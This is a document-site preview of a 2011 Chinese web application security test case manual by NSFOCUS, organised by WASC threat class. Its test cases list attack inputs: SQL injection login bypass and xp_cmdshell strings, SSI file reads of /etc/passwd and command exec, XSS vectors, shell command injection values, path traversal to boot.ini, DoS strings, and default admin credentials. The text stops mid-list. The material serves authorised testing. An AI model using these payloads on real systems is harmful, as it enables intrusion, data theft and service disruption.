ADSL4-VER02-应用系统软件开发安全测试用例V1.0_第1页
ADSL4-VER02-应用系统软件开发安全测试用例V1.0_第2页
ADSL4-VER02-应用系统软件开发安全测试用例V1.0_第3页
ADSL4-VER02-应用系统软件开发安全测试用例V1.0_第4页
ADSL4-VER02-应用系统软件开发安全测试用例V1.0_第5页
已阅读5页,还剩20页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

DOCPROPERTYTitle应用系统软件开发安全测试用例■文档编号NADSL-VER02■密级DOCPROPERTY密级商业机密■版本编号V1.1■日期2011-2-21©DATE\@"yyyy"2022DOCPROPERTYCompany绿盟科技版权所有,未经授权,严禁复制、编辑和传播!

■版权声明本文中出现的任何文字叙述、文档格式、插图、照片、方法、过程等内容,除另有特别注明,版权均属DOCPROPERTYCompany绿盟科技所有,受到有关产权及版权法保护。任何个人、机构未经DOCPROPERTYCompany绿盟科技的书面授权许可,不得以任何方式复制或引用本文的任何片断。■版本变更记录时间版本说明修改人2011-2-15V1.0文档创建、丰富内容专业服务部2011-2-21V1.1丰富内容专业服务部■适用性声明本文档为中联绿盟信息技术(北京)有限公司(以下简称“绿盟科技”)为华夏基金应用系统开发提交的软件开发安全测试用例,用于帮助、提高开发人员,为更好的完成系统开发进行指导。 PAGE1-©2011绿盟科技 密级:商业机密目录TOC\h\z\t"附录1(绿盟科技),1,附录2(绿盟科技),2,附录3(绿盟科技),3,附录4(绿盟科技),4,标题1(绿盟科技),1,标题2(绿盟科技),2,标题3(绿盟科技),3"一.安全测试内容 2二.安全测试用例 32.1认证和授权类 32.1.1暴力攻击 32.1.2认证不充分 42.1.3会话定置 52.1.4会话期限不充分 62.1.5凭证/会话预测 62.1.6授权不充分 62.2逻辑攻击类 82.2.1功能滥用 82.2.2拒绝服务 112.3客户端攻击类 122.3.1跨站点脚本编制 122.3.2内容电子欺骗 132.4命令执行类 142.4.1LDAP注入 142.4.2SSI注入 142.4.3SQL注入 152.4.4Xpath注入 162.4.5操作系统命令 162.4.6格式字符串攻击 172.4.7缓冲区溢出 172.5信息泄露类 182.5.1可预测资源定位 182.5.2路径遍历 202.5.3目录索引 212.5.4信息泄露 21附录A 工具 22A.1 TamperIE(TamperData) 22A.2 Webvulnerabilityscanner 22A.3 IBMRationalAppScan 22

安全测试内容测试人员根据WASC威胁分类WASC即WebApplicationSecurityConsortiumWASC即WebApplicationSecurityConsortium。是一个由安全专家、行业顾问和诸多组织的代表组成的国际团体。他们负责为WWW制定被广为接受的应用安全标准。WASC组织的关键项目之一是“Web安全威胁分类”,也就是将Web应用所受到的威胁、攻击进行说明并归纳成具有共同特征的分类。认证和授权类命令执行类暴力攻击LDAP注入认证不充分SSI注入会话定置SQL注入会话期限不充分Xpath注入凭证/会话预测操作系统命令授权不充分格式字符串攻击逻辑攻击类缓冲区溢出功能滥用信息泄漏类拒绝服务可预测资源定位客户端攻击类路径遍历跨站点脚本编制目录索引内容电子欺骗信息泄露WASC威胁分类图由于网上交易系统区别于普通的WEB系统,因此,测试人员根据网上交易系统的特点,从实际出发采用手工测试的方法,对五大类威胁中的部分内容进行测试。具体测试内容用例见下章节。安全测试用例认证和授权类暴力攻击可预测的登录凭证检测类认证和授权类-暴力攻击-可预测的登录凭证检测内容对可预测的登录凭证进行检查检测方法使用基于FROM方式的HTTP暴利破解工具进行帐户的口令暴利猜测。基于用户名、密码表的暴利猜测。利用的样本:用户名:admin密码:admin用户名:guest密码:guest用户名:test密码:test用户名:username密码:password用户名:demo密码:demo备注不存在验证码的登录过程不充分的帐户封锁

检测类认证和授权类-暴力攻击-不充分的帐户封锁检测内容多次发送错误的登录请求,检测不充分的帐户封锁检测方法下列请求说明密码猜测请求:http://site/login.jsp?username=EXISTING_USERNAME&password=GUESSED_PASSWORD如果站点在若干次错误尝试之后并不锁定测试的帐户,攻击者最终可能会发现帐户密码,并使用它来假冒帐户的合法用户。备注不存在验证码的登录过程登录错误消息凭证枚举检测类认证和授权类-暴力攻击-登录错误消息凭证枚举检测内容对登录错误消息凭证枚举进行检查,检测登录错误消息凭证枚举检测方法如果下列请求收到不同的错误消息,就有可能对站点发出蛮力攻击并枚举用户名和密码:[1]GET/login.jsp?username=BAD_USERNAME&password=correct_password[2]GET/login.jsp?username=correct_username&password=BAD_PASSWORD备注认证不充分HTTPPUT方法站点篡改检测类认证和授权类-认证不充分-HTTPPUT方法站点篡改检测内容对HTTPPUT方法站点篡改进行检查检测方法检查利用匿名“PUT”方法对WEB跟目录进行写操作备注JBossJava/web管理扩展控制台认证旁路检测类认证和授权类-认证不充分-JBossJava/web管理扩展控制台认证旁路检测内容检查JBossJava/web管理扩展控制台认证旁路检测方法利用的样本:将路径设置为:http://[SERVER]/jmx-console/http://[SERVER]:8080/jmx-console/http://[SERVER]/web-console/http://[SERVER]:8080/web-console/备注受影响产品:JBossWeb服务器文件检索检测类认证和授权类-认证不充分-Web服务器文件检索检测内容检查Web服务器文件检索检测方法利用的样本:向路径中附加以下字符串:?向目录中附加以下字符串:?下列请求会检索*.nsf文件的内容:http://TARGET/*.nsf?备注使用SQL注入的认证旁路检测类认证和授权类-认证不充分-使用SQL注入的认证旁路检测内容检查使用SQL注入的认证旁路检测方法登录过程用户名、密码输入SQL注入语句,验证是否存在SQL注入的认证旁路。利用的样本:使用SQL注入的认证旁路:OR‘769’=’769’变体使用SQL注入的认证旁路:”或isnull(1/0)/*变体使用SQL注入的认证旁路:-(SQL注释)变体使用SQL注入的认证旁路:--(SQL注释)变体使用SQL注入的认证旁路:)-(SQL注释)变体使用SQL注入的认证旁路:)--(SQL注释)变体使用SQL注入的认证旁路:’)--(SQL注释)变体使用SQL注入的认证旁路:”)--(SQL注释)变体备注会话定置会话标识未更新检测类认证和授权类-会话定置-会话标识未更新检测内容检测会话标识登录前、后是否未更新检测方法检查登录前、登录后系统会话是否改变。备注会话固定检测类认证和授权类-会话定置-会话固定检测内容检查是否存在会话固定检测方法将会话标识移至路径参数中;将会话标识移至主体参数中;如果会话管理系统接受URL参数形式的会话标识,下列请求便可以强迫会话标识采用URL参数值。http://example/login.jsp?SESSIONID=1234备注会话期限不充分Cookie包含敏感的会话信息检测类认证和授权类-会话期限不充分-永久Cookie包含敏感的会话信息检测内容检测是否存在永久Cookie包含敏感的会话信息检测方法检测在客户端的计算机上,将用户凭证或会话令牌之类的敏感会话信息存储在永久cookie中。备注注销后会话未失效检测类认证和授权类-会话期限不充分-注销后会话未失效检测内容检查注销后会话是否未失效检测方法这项测试先注销应用程序,然后试图利用会话标识来访问保护资源。如果资源检索成功,就表示服务器未将Cookie设为到期。备注凭证/会话预测ApacheTomcat弱缺省管理帐户凭证检测类认证和授权类-凭证/会话预测-ApacheTomcat弱缺省管理帐户凭证检测内容检测是否存在ApacheTomcat弱缺省管理帐户凭证检测方法ApacheTomcat上管理帐户的缺省凭证是ADMIN/ADMIN。检查这些凭证很容易列出或被猜出。备注受影响产品:ApacheTomcat授权不充分AccountManagerCGI远程密码更改检测类认证和授权类-授权不充分-AccountManagerCGI远程密码更改检测内容检测是否存在AccountManagerCGI远程密码更改检测方法利用amadmin.pl脚本,可以更改管理员密码利用的样本:POST/cgibin/amadmin.pl?setpasswdHTTP/1.0Content-Type:application/x-www-form-urlencodingContent-Length:[calculate]pwd=NEWPASS&pwd2=NEWPASS&setpwd=????其中NEWPASS是新的明文密码值。备注受影响产品:AccountManagerLITE1.0ApacheTomcatContextAdministrationTool无特权访问检测类认证和授权类-授权不充分-ApacheTomcatContextAdministrationTool无特权访问检测内容检测是否存在ApacheTomcatContextAdministrationTool无特权访问检测方法Tomcat的某些版本的缺省配置并不限制访问上下文管理应用程序。攻击者可以使用上下文管理工具来查看Web服务器的帐户在系统上已获特许的所有文件。利用的样本:http://[SERVER]/admin/contextAdmin/contextAdmin.html备注BannerRotating01特权升级检测类认证和授权类-授权不充分-BannerRotating01特权升级检测内容检测是否存在BannerRotating01特权升级检测方法adpassword.txt在脚本的相同目录中。攻击者可能很容易利用下列请求来检索到:GET/adpassword.txtHTTP/1.0这会检索文件,使攻击者得以设置密码破解攻击。备注BEAWebLogic管理界面检测类认证和授权类-授权不充分-BEAWebLogic管理界面检测内容检测是否存在BEAWebLogic管理界面检测方法利用的样本:http://[SERVER]/AdminMainhttp://[SERVER]/AdminPropshttp://[SERVER]/AdminRealmhttp://[SERVER]/console/index.jsphttp://[SERVER]/webtopgui.html备注通过Cookie操纵的可能的垂直特权升级检测类认证和授权类-授权不充分-通过Cookie操纵的可能的垂直特权升级检测内容检测是否存在通过Cookie操纵的可能的垂直特权升级检测方法已发现使用cookie来设置用户特权的情况。通过强制操纵cookie,可以将用户的特权升级到管理级别。将cookie某值设置为:0将cookie某值设置为:1将cookie某值设置为:on将cookie某值设置为:true将cookie某值设置为:t将cookie某值设置为:yes将cookie某值设置为:y备注MicrosoftFrontPageExtensions站点篡改检测类认证和授权类-授权不充分-MicrosoftFrontPageExtensions站点篡改检测内容检测是否存在MicrosoftFrontPageExtensions站点篡改检测方法这些DLL在FrontPageweb顶级目录下的目录中创建:http://[SERVER]/_vti_bin/_vti_adm/admin.dll,用于管理任务http://[SERVER]/_vti_bin/_vti_aut/author.dll,用于编写FrontPagewebhttp://[SERVER]/_vti_bin/shtml.dll,用于浏览时期的FrontPage组件,如表单处理程序。备注受影响产品:MicrosoftFrontPage逻辑攻击类功能滥用BEAWebLogic命令执行检测类逻辑攻击类-功能滥用-BEAWebLogic命令执行检测内容检测是否存在BEAWebLogic命令执行检测方法利用的样本:http://[SERVER]/*.jsp/备注IMAPMX注入检测类逻辑攻击类-功能滥用-IMAPMX注入检测内容检测是否存在IMAPMX注入检测方法利用的样本:http://[SERVER]/webmail.php?message_id=5%0a1234STORE5+FLAGS.SILENT(\Deleted)%0a1234CLOSE备注POP3MX注入检测类逻辑攻击类-功能滥用-POP3MX注入检测内容检测是否存在POP3MX注入检测方法利用的样本:http://[SERVER]/webmail.php?message_id=5%0a1234STORE5+FLAGS.SILENT(\Deleted)%0a1234CLOSE备注SMTPMX注入检测类逻辑攻击类-功能滥用-SMTPMX注入检测内容检测是否存在SMTPMX注入检测方法利用的样本:http://[SERVER]/webmail.php?to=non_exist@%0arcptto:me@备注电子盗窃检测类逻辑攻击类-功能滥用-电子盗窃检测内容检测是否存在电子盗窃检测方法利用的样本:将价格参数值更改为123.45(或其他关键交易信息)备注注意:在URL中传递价格参数(通过GET请求,而不是POST请求)时可能该问题仍然存在。电子邮件参数电子欺骗检测类逻辑攻击类-功能滥用-电子邮件参数电子欺骗检测内容检测是否存在电子邮件参数电子欺骗检测方法利用的样本:将参数值设置为test@备注注意:在URL中传递价格参数(通过GET请求,而不是POST请求)时可能该问题仍然存在。启用了TRACE和TRACKHTTP方法检测类逻辑攻击类-功能滥用-启用了TRACE和TRACKHTTP方法检测内容检测是否启用了TRACE和TRACKHTTP方法检测方法尝试执行HTTPTRACE方法、HTTPTRACK方法备注注意:在URL中传递价格参数(通过GET请求,而不是POST请求)时可能该问题仍然存在。文件上载检测类逻辑攻击类-功能滥用-文件上载检测内容检测是否存在文件上载检测方法提交请求同时更换表单中上载文件名称,检测服务器端的响应情况将文件后缀设置为:.exe将文件后缀设置为:.exe.jpg将文件后缀设置为:.exe.jpg.jpg将文件后缀设置为:.exe.j(jpg)pg(不含括号)将文件后缀设置为:.exe…jpg将文件后缀设置为:.exe.%00将文件后缀设置为:.exe.%00.jsp备注应用程序调试方式实施检测类逻辑攻击类-功能滥用-应用程序调试方式实施检测内容检测是否存在可疑的应用程序调试方式实施检测方法利用的样本:向查询中添加以下参数名称/值对:DEBUG=ON向查询中添加以下参数名称/值对:DEBUG=1向查询中添加以下参数名称/值对:dbg=on向查询中添加以下参数名称/值对:Debug=true向查询中添加以下参数名称/值对:DEBUG=YES向查询中添加以下参数名称/值对:DEBUG=T备注拒绝服务Apache主机头拒绝服务检测类逻辑攻击类-拒绝服务-Apache主机头拒绝服务检测内容检测是否存在Apache主机头拒绝服务检测方法将HTTP“HOST”头值更改为“AAA…AA”(2000个)备注受影响产品:ApacheBEAWebLogicDOS设备拒绝服务检测类逻辑攻击类-拒绝服务-BEAWebLogicDOS设备拒绝服务检测内容检测是否存在BEAWebLogicDOS设备拒绝服务检测方法利用的样本:发送下列请求超出12次会导致服务器停止响应:http://target//aux%00-或-http://target//aux%00.jsp-或-http://target/aux.jsp备注受影响产品:BEASystemsWebLogic(7.0SP1及其以下的版本)超长字段拒绝服务攻击检测类逻辑攻击类-拒绝服务-超长字段拒绝服务攻击检测内容检测是否存在超长字段拒绝服务攻击检测方法对于GET\POST提交的所有参数字段/值更改为“AAA…AA”(2000个)备注客户端攻击类跨站点脚本编制跨站点请求伪造检测类客户端攻击类-跨站点脚本编制-跨站点请求伪造检测内容检测是否存在跨站点请求伪造检测方法除去HTTP“x-requested-with”头信息备注跨站点脚本编制检测类客户端攻击类-跨站点脚本编制-跨站点脚本编制检测内容检测是否存在跨站点脚本编制检测方法将所有用户输入、GET、POST参数设置为:>’”><script>alert(Nsf)</script>以下列出各种变体:[1]>'><script>alert('Nsf')</script>[2]>"><script>alert("Nsf")</script>[3]</TextArea><script>alert('Nsf')</script>[4]>"'><imgsrc="javascript:alert('Nsf')">[5]>"'><imgsrc=javascript:alert("Nsf")>[6]"style="background:url(javascript:alert('Nsf'))"OA="[7]--><script>alert('Nsf')</script>[8]'+alert('Nsf')+'[9]"+alert('Nsf')+"[10]>'><%00script>alert('Nsf')</script>(.NET1.1specificvariant)[11]>"><%00script>alert("Nsf")</script>(.NET1.1specificvariant)[12]>+ACI-+AD4-+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-[13]%A7%A2%BE%Bc%F3%E3%F2%E9%F0%F4%Be%E1%Ec%E5%F2%F4%A8%A7Nsf%A7%A9%Bc%Af%F3%E3%F2%E9%F0%F4%Be备注内容电子欺骗通过框架钓鱼检测类客户端攻击类-内容电子欺骗-通过框架钓鱼检测内容检测是否存在通过框架钓鱼检测方法将参数值设置为:’"><framename=nsfsrc=>’"><framesrc=>如果参数值未经适当清理便反映在响应中,那么下列请求:http://[SERVER]/script.aspx?parameter=<framename="nsfweb"src="">会使响应含有通往这个nsfweb站点的框架。备注通过URL重定向钓鱼检测类客户端攻击类-内容电子欺骗-通过URL重定向钓鱼检测内容检测是否存在通过URL重定向钓鱼检测方法利用的样本:当找到含有类似URL值的参数时,请将它修改成指向另一个站点。例如,下列请求:http://site/redirect.aspx?target=会修改成:http://site/redirect.aspx?target=http://www.备注启用了不安全的HTTP方法检测类客户端攻击类-内容电子欺骗-启用了不安全的HTTP方法检测内容检查目录中是否允许使用不安全的HTTP方法检测方法检查Web服务器配置成允许下列其中一个(或多个)HTTP方法(动词):DELETE、COPY、MOVE、PUT备注命令执行类LDAP注入LDAP注入检测类命令执行类-LDAP注入检测内容检查是否存在LDAP注入检测方法向原始参数值中附加以下字符串:#&《(,+“);备注受影响产品:LDAPSSI注入服务器端伪指令文件检索检测类命令执行类-SSI注入-服务器端伪指令文件检索检测内容检查是否存在服务器端伪指令文件检索检测方法将参数值设置为:<!--#includefile="/etc/passwd"-->(会显示给定的文件)<!--#includefile="c:\boot.ini"-->(会显示给定的文件)<!--#execcmd="ipconfig"-->(会执行给定的shell命令)备注MattWrightGuestbook.pl服务器端包含执行检测类命令执行类-SSI注入-MattWrightGuestbook.pl服务器端包含执行检测内容检查是否存在MattWrightGuestbook.pl服务器端包含执行检测方法利用的样本:POST/cgi-bin/guestbook.plHTTP/1.0Content-Length:[calculate]comments=<!--#execcmd="COMMAND"&realname=foobar会插入SSI来执行COMMAND命令。备注受影响产品:MattWright的Guestbook.pl2.3(在Apache1.3.9以及其他版本上)SQL注入SQL注入检测类命令执行类-SQL注入-SQL注入检测内容检查是否存在SQL注入检测方法向原始参数值中附加以下字符串:;向原始参数值中附加以下字符串:having1=1--向原始参数值中附加以下字符串:1having1=1--向原始参数值中附加以下字符串:\’having1=1--向原始参数值中附加以下字符串:)having1=1--向原始参数值中附加以下字符串:%a5’having1=1--向原始参数值中附加以下字符串:%uFF07向原始参数值中附加以下字符串:’向原始参数值中附加以下字符串:’;select@@version,1,1,1--向原始参数值中附加以下字符串:;select*frommaster..sysmessages--向原始参数值中附加以下字符串:;select*fromdbo.sysdatabases--向原始参数值中附加以下字符串:;select*fromsys.dba_users—将HTTP“X-Forwarded-For”头值更改为:’将HTTP“X-Forwarded-For”头值更改为:%27将HTTP“X-Forwarded-For”头值更改为:%2527将HTTP“X-Forwarded-For”头值更改为:"将HTTP“X-Forwarded-For”头值更改为:%c0%a7将HTTP“Referer”头值更改为:’将HTTP“Referer”头值更改为:%27将HTTP“Referer”头值更改为:%2527将HTTP“Referer”头值更改为:"将HTTP“Referer”头值更改为:%c0%a7通过使用/**/而不是空格来附加布尔True/False表达式备注SQL注入命令执行检测类命令执行类-SQL注入-SQL注入命令执行检测内容检查是否存在SQL注入命令执行检测方法向原始参数值中附加以下字符串:%20exec%20master..xp_cmdshell%20’ver’--备注SQL注入文件写入检测类命令执行类-SQL注入-SQL注入文件写入检测内容检查是否存在SQL注入文件写入检测方法向原始参数值中附加以下字符串:’;%20exec%20master..xp_cmdshell%20’echo[paramname]in[path]isvulnerable>>c:\nsfocusSQLTest.txt’—向原始参数值中附加以下字符串:%20exec%20master..xp_cmdshell%20’echo[paramname]in[path]isvulnerable>>c:\nsfocusSQLTest.txt’--备注Xpath注入XPath注入检测类命令执行类-XPath注入-XPath注入检测内容检查是否存在XPath注入检测方法将参数值设置为:%22%27备注操作系统命令文件参数Shell命令注入检测类命令执行类-操作系统命令-文件参数Shell命令注入检测内容检测是否存在文件参数Shell命令注入检测方法将参数值设置为:;vol|将参数值设置为:id|将参数值设置为:../../../../../../../bin/id|将参数值设置为:../../../../../../../usr/bin/id|将参数值设置为:.../.../.../.../.../.../.../bin/id|将参数值设置为:.../.../.../.../.../.../.../usr/bin/id|备注参数系统调用代码注入检测类命令执行类-操作系统命令-参数系统调用代码注入检测内容检测是否存在参数系统调用代码注入检测方法将参数值设置为:%7Cvol将参数值设置为:%26%26vol将参数值设置为:%7C%7Cvol将参数值设置为:%27%20%7C%20%27vol将参数值设置为:%22%20%7C%20%22vol将参数值设置为:%7Cid将参数值设置为:%26%26id将参数值设置为:%7C%7Cid将参数值设置为:%27%20%7C%20%27id将参数值设置为:%22%20%7C%20%22id将参数值设置为:id备注格式字符串攻击格式字符串远程命令执行检测类命令执行类-格式字符串攻击-格式字符串远程命令执行检测内容检测是否存在格式字符串远程命令执行检测方法将参数值设置为:%50.50d将参数值设置为:%n%n%n…(50次)备注缓冲区溢出应用程序路径溢出检测类命令执行类-缓冲区溢出-应用程序路径溢出检测内容检测是否存在应用程序路径溢出检测方法通过向路径中附加字符串:AAA…(20000个)来对应用程序路径溢出进行检查,将路径设置为:/AAA…(3000个)备注参数值溢出检测类命令执行类-缓冲区溢出-参数值溢出检测内容检测是否存在参数值溢出检测方法将参数值设置为:AAA…(10000个)备注信息泄露类可预测资源定位直接访问管理页面检测类信息泄露类-可预测资源定位-直接访问管理页面检测内容检测是否存在直接访问管理页面检测方法利用的样本:http://[SERVER]/admin.phphttp://[SERVER]/admin.jsphttp://[SERVER]/admin.asphttp://[SERVER]/admin.aspxhttp://[SERVER]/admin.htmlhttp://[SERVER]/admin.cfmhttp://[SERVER]/admin.cgihttp://[SERVER]/admin/admin.phphttp://[SERVER]/admin/admin.jsphttp://[SERVER]/admin/admin.asphttp://[SERVER]/admin/admin.aspxhttp://[SERVER]/admin/admin.htmlhttp://[SERVER]/admin/admin.cfmhttp://[SERVER]/admin/admin.cgi备注临时文件下载检测类信息泄露类-可预测资源定位-临时文件下载检测内容检测是否存在临时文件下载检测方法利用的样本:将文件扩展名更改为:old将文件扩展名更改为:sav将文件扩展名更改为:$$$将文件扩展名更改为:tmp将文件扩展名更改为:bak将文件扩展名更改为:bac将文件扩展名更改为:backup将文件扩展名更改为:lst将文件扩展名更改为:orig将文件扩展名更改为:save将文件扩展名更改为:temp将文件扩展名更改为:-old向路径中附加以下字符串:1向路径中附加以下字符串:.cs.old向路径中附加以下字符串:~向路径中附加以下字符串:.old向路径中附加以下字符串:.sav向路径中附加以下字符串:.bak向路径中附加以下字符串:.temp备注检测应用程序测试脚本检测类信息泄露类-可预测资源定位-应用程序测试脚本检测内容检测是否存在应用程序测试脚本检测方法利用的样本:http://[SERVER]/testhttp://[SERVER]/test.phphttp://[SERVER]/test.jsphttp://[SERVER]/test.asphttp://[SERVER]/test.aspxhttp://[SERVER]/test.htmlhttp://[SERVER]/test.cfmhttp://[SERVER]/test.cgihttp://[SERVER]/test.plhttp://[SERVER]/test.txt备注包含文件下载检测类信息泄露类-可预测资源定位-包含文件下载检测内容检测是否存在包含文件下载检测方法利用的样本:向路径中附加以下字符串:.inc向路径中附加以下字符串:.INC将文件扩展名更改为:inc将文件扩展名更改为:INC假设站点有一个称为“/scripts/login.inc”的文件,下列请求会显现它的内容:http://TARGET/scripts/login.inc备注路径遍历Windows文件参数变更检测类信息泄露类-路径遍历-windows文件参数变更检测内容检测是否存在windows文件参数变更检测方法将参数值设置为:/../../../../../../../boot.ini%00.html将参数值设置为:\..\..\..\..\..\..\..\boot.ini%00.html将参数值设置为:/..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini%00.html将参数值设置为:/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/boot.ini%00.html将参数值设置为:/%c0%ae%c0%ae/

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论